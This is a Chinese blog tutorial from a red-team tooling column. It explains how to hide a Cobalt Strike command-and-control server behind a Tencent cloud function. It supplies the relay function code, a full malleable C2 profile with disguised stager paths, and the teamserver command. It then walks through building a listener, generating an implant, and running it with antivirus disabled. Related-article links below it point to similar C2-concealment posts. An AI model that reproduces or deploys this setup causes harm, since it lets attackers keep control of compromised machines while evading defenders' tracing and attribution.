云函数实现隐藏c2地址

最新推荐文章于 2024-07-25 14:14:26 发布
最新推荐文章于 2024-07-25 14:14:26 发布
阅读量638 收藏 8
点赞数 9
分类专栏: 红队工具建设 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/milu_Sec/article/details/135305675
版权

介绍

说明:云函数是一个可以为开发者提供的无服务器执行代码的环境,相当于我们可以提前部署一个云函数,当我们需要运行这段代码的时候只需要通过去请求某一个特定的地址(即云函数地址)就可以运行了。因为云函数的请求域名解析出来的IP是变化的,所以可以用来隐藏c2地址

实现

1.配置云函数

打开腾讯云云函数配置中心,从头开始配置一个云函数,注意选择python3.6

图片

图片

配置代码写如下代码,c2地址填写 协议+ip+port,如http://127.0.0.1:80,本文使用80端口,所以后续使用http beacon

# -*- coding: utf8 -*-
import json,requests,base64
def main_handler(event, context):
    C2='http://ip'
    path=event['path']
    headers=event['headers']
    print(event) 
    if event['httpMethod'] == 'GET' : 
        resp=requests.get(C2+path,headers=headers,verify=False) 
    else: 
        resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False) 
        print(resp.headers) 
        print(resp.content)
    response={
        "isBase64Encoded": True,
        "statusCode": resp.status_code,
        "headers": dict(resp.headers),
        "body": str(base64.b64encode(resp.content))[2:-1]
    }
    return response

这段代码什么意思呢

该函数的目的是将传入的 HTTP 请求转发到指定的 URL,并将响应返回给调用方。

该函数从事件中提取出 HTTP 请求的路径、标头和正文。然后,它使用 Python 的 requests 库将请求发送到指定的 URL,并获取响应。最后,该函数将响应的状态码、标头和正文转换为一个 JSON 对象,并将其返回给调用方。

图片

图片

运行一下看是否正常,然后部署

图片

配置一下触发管理

图片

然后点这里继续配置

图片

编辑配置(右上角)

图片

路径改成/

图片

然后完成,此时我们就会得到一个公网地址,这个就会作为我们的c2上线地址

图片

2.配置cs

cs根目录配置一个cs的profile(这里不需要任何改动)只需要把后缀改成.profile

set sample_name "kris_abao";

set sleeptime "3000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/api/getit";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/postit";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}

这段代码是一个基于HTTP的攻击工具的配置文件,用于定制攻击行为。其中设置了多个变量,包括样本名称、sleep时间、抖动时间、最大DNS数量和用户代理。代码定义了三个HTTP请求:http-get、http-stager和http-post。每个请求都设置了URI路径,并定义了客户端和服务器端的HTTP头部。客户端头部设置了Accept和Cookie,其中Cookie值使用base64编码。服务器端头部设置了Content-Type、content-transfer-encoding和Server。输出使用base64编码并打印。此外,该代码还说明了HTTP请求的基本结构和用途。然后服务端启动cs

./teamserver 你的vps(服务端)ip 密码 ./1.profile

图片

出现这样的界面就ok了(建议用高版本cs,我之前用4.0一直起不来)

然后启动对应版本号的cs客户端

设置监听器,选http就行

图片

把这里的公网域名复制到http hosts和http host(stager)里

图片

(注意,host里不需要加http:和端口,不懂可以百度一下host是什么)

然后监听器创建成功

图片

接着尝试给自己电脑上一个马子(记得关杀软)

图片

选择刚才建立的监听器

图片

然后运行exe,可以发现ip一直在变化

图片

图片

图片

自此,我们已经实现用云函数隐藏c2地址

一些可能踩雷的点

如果云函数代码里配置的是vps80端口,记得不要和其他进程冲突端口

记得vps开启50050(如果设置的是cs默认连接端口)和80端口

profile文件缩进不当会报错

欢迎关注麋鹿安全,我们的文章会第一时间更新在公众号

麋鹿安全
关注
专栏目录
函数隐藏C2
问题很多的小明
05-09 859
函数内容: 向真实C2服务器传递客户端真实ip,转发GET、POST请求,内容参考https://mp.weixin.qq.com/s/3EM6vqPJSA5E_FH6tKO8iw 部署后测试,访问API网关,真实服务器监听对应端口,查看数据包: 服务端配置 获取真实ip的必要配置,参考https://mp.weixin.qq.com/s/lL3UKCRW0cN4SgQIZl7vYw set sample_name "t"; set sleeptime "3000"; set ji
同态加密与安全多方计算原理与代码实战案例讲解
程序员光剑
06-02 63
在当今的数字时代,数据已经成为了一种无形的宝贵资源。无论是个人还是企业,都在不断产生和收集大量的数据。这些数据不仅包含了敏感的个人信息,还可能涉及商业机密和知识产权等重要内容。因此,确保数据的安全性和隐私性就显得至关重要。传统的数据保护方式通常是在本地对数据进行加密,但这种做法会带来一些问题。首先,加密数据无法直接进行计算和处理,需要先解密,这就暴露了数据的隐私。其次,在计算等场景下,数据需要在不同的节点之间传输和共享,如果采用传统加密方式,就需要在每个节点上解密,这无疑增加了数据泄露的风险。
【红队APT】反朔源隐藏&C2项目&CDN域前置&函数&数据中转&DNS转发
今天是几号的博客
04-19 3304
区别于单纯的CDN隐藏IP技术;域前置技术采用高权重域名进行伪装,效果要更上一层楼!可以看到这里正常上线,也是简单的进行流量代理,这里我把上面的iptables转发配置清空了,避免干扰 注: 如果中转服务器被拿下的话,那么搜集信息很可能就可以发现请求重定向的痕迹,从而找到真实C2地址。 请求重定向也可以和之前的CDN方法相结合,之前CDN方法是通过CDN将请求转发到真实的C2服务器上,而添加请求重定向后,流程就变为了CDN转发到中转服务器,中转服务器再转到C2,达到双重隐藏的效果。
函数利用&Profile混淆
最新发布
2301_80115097的博客
07-25 602
独有一份的xx函数利用教程和profile混淆技术认识
使用腾讯函数隐藏C2
2201_75387456的博客
05-23 910
腾讯函数(Serverless Cloud Function,SCF),可以为企业和开发者提供无服务器执行环境,无需购买和管理服务器,只要在腾讯上使用平台支持的语言编写核心代码并设置代码运行的条件,即可在腾讯基础设施上弹性、安全地运行代码。所有的流量都是通过腾讯函数进行转发,因此溯源后门只能得到腾讯的域名和IP,且函数的服务器是自带 CDN 的,能够很好的隐藏我们的C2服务器。发布成功,到这里我们的函数和触发器就配置成功了。域前置,走cdn域名,利用函数。保存,生成后门进行测试。
函数隐藏c2服务器
weixin_44747030的博客
01-15 8670
学习记录
函数隐匿C2服务器
m0_58687645的博客
03-04 7124
第一步,创建函数 登录腾讯平台,访问函数功能链接:https://console.cloud.tencent.com/scf/list?rid=8&ns=default。点击新建,创建方式选择自定义创建。函数名称可以自定义进行设置,主要是函数代码部分,将下面内容复制到函数代码中: # -*- coding: utf8 -*- import json,requests,base64 def main_handler(event, context): C2='http://<C
利用腾讯函数隐藏C2服务器
xiaokp7的博客
06-17 759
隐藏c2服务器
【MySQL】函数
m0_58465176的博客
08-12 745
MySQL函数的概述 1.聚合函数2数学函数3.字符串函数4.日期函数5.控制流函数6.窗口函数 序号函数 开窗聚合函数-SUM,AVG,MIN,MAX 分布函数-CUME_DIST和PERCENT_RANK前后函数-LAG和LEAD 头尾函数- FIRST_VALUE和LAST_VALUE其他函数-NTH_VALUE(expr,n)、NTILE(n)...
Python实现Office自动化办公(实现Python对word基本操作、对excel基本操作、在word中插入表格、word中插入网站爬虫取图)
weixin_43756157的博客
11-26 7931
Python实现Office办公自动化Pycharm 2018(Mac版)的下载功能快捷键如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Pycharm 2018(Mac版)的下载 如果初次使用 Pycharm ,首先要知道PyCharm是一种Python IDE(IDE,全称Integrated D
【C语言扫盲】关键字static究竟限制了谁?
一个专注于嵌入式IoT领域的架构师,深耕IoT领域多年,深度掌握IoT领域的相关技术栈,包括但不限于RTOS内核的实现及其移植、硬件驱动移植开发、网络通讯协议开发、编译构建原理及其实现、底层汇编及编译原理、编译优化及代码重构、嵌入式IoT系统的架构设计等。
07-24 8257
这是一个有趣的话题,虽然说教科书给了你一些说法,但你真正能把static说清楚吗?本文将通过一个案例,给大家做一个深度的拆解分析。
YOLOv5模型压缩方法:综述
AI浩
08-04 4298
目标检测作为一个基本问题,多年来一直是一个活跃的研究领域。目标检测的主要目标是在给定的图像中从不同类别中识别和定位感兴趣的目标。目标检测是许多其他高级计算机视觉任务的基础[1],从语义分割[2]到目标跟踪[3]到活动识别[4]。近年来,基于深度学习的方法如卷积神经网络(cnn)在目标检测任务中取得了最先进的性能。由于计算能力和前沿算法的进步,目标检测变得更加准确,从而实现了广泛的现实世界应用。与经典的目标检测方法相比,使用cnn缓解了目标检测中的特征提取、分类和定位问题[5,6,7,8,9,10]。
函数隐藏C2技术的防御反制思路
include_voidmain的博客
08-30 1756
函数隐藏C2技术的防御反制思路
C2使用函数进行隐藏和加速
sweelg的博客
09-18 403
C2使用函数进行隐藏和加速利用函数将我们的请求进行转发(和一些使用第三方应用进行转发是一样的);C2客户端发出的流量经过 函数的转发,到达我们的C2服务器,达到隐藏的效果https://mp.weixin.qq.com/s/gfBE-HaUCgQw8L0QByqTDA ...
隐藏C2服务器IP的各种方法总结
sweelg的博客
09-18 926
利用CDN、域前置、重定向三种技术隐藏C2的区别_Shanfenglan's blog-CSDN博客_域前置 前言 这个课题前段时间已经分别做过研究,但没有写三者的区别分析,以为自己可以将三种技术永远记在心里,但是事实是确实淡忘一部分知识点,导致现在对三者的理解出现偏差。 反思:以后倘若需要做技术记录,一定要详细详细再详细,有备无患。不能抱有侥幸心理,因为你永远不知道,问题与遗忘哪一个会先来 对于三种隐藏技术的理解 CDN技术隐藏C2 反溯源-cs和msf域名上线 利用CDN隐藏C2地址 使用CDN
手把手教你如何隐藏C2
Ms08067安全实验室
05-19 1209
文章来源|MS08067 公众号读者投稿本文作者:下次一定(白嫖知识星球活动)CDN技术隐藏C2原理让cdn转发合法的http或者https流量来达到隐藏的目的。这些文章写的很详细,总结一...
使用函数隐藏webshell的真实IP
weixin_61638307的博客
04-10 566
在平时的学习工作中,大家有没有遇到一穿webshell就被ban掉IP呢,今天本文就决定分享一个使用函数隐藏自己的真实IP的案例,也可以利用函数的多出口性为了防止被红队溯源。
腾讯函数部署环境[使用函数URL]
挖到尽头
07-04 340
腾讯函数部署环境[使用函数URL]
腾讯函数例程实践之信息获取
挖到尽头
03-05 2651
作为一个嵌入式开发工程师,经常和上位机打交道,自然而然就涉及到了C++ C# app ios 小程序等,想不到最后自己竟然莫名其妙的片面掌握基本入门了这些上位机的技能,实在无奈呀!当把这些上位机的相关知识片面掌握后发现没有服务器不行呀,没有服务器没有办法实现两个上位机的交互,所以这里又研究起服务器来。其实之前我就有被学长带入过坑里学习过PHP,知道服务器的大体流程,其中比较麻烦的就是PHP的语言还是比较复杂的,而且搭建服务器的过程确实比较麻烦的,这里无意发现腾讯函数的概念,相当于腾讯已经帮我搭建好了服
C语言实现多种窗函数详解
本文是一篇关于在C语言中实现不同窗函数的教程,主要针对电子工程师和单片机开发人员,特别是那些从事数字信号处理(DSP)工作的人。窗函数在信号处理中扮演着重要角色,它们用于减少频谱泄漏,改善频谱特性,特别是在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值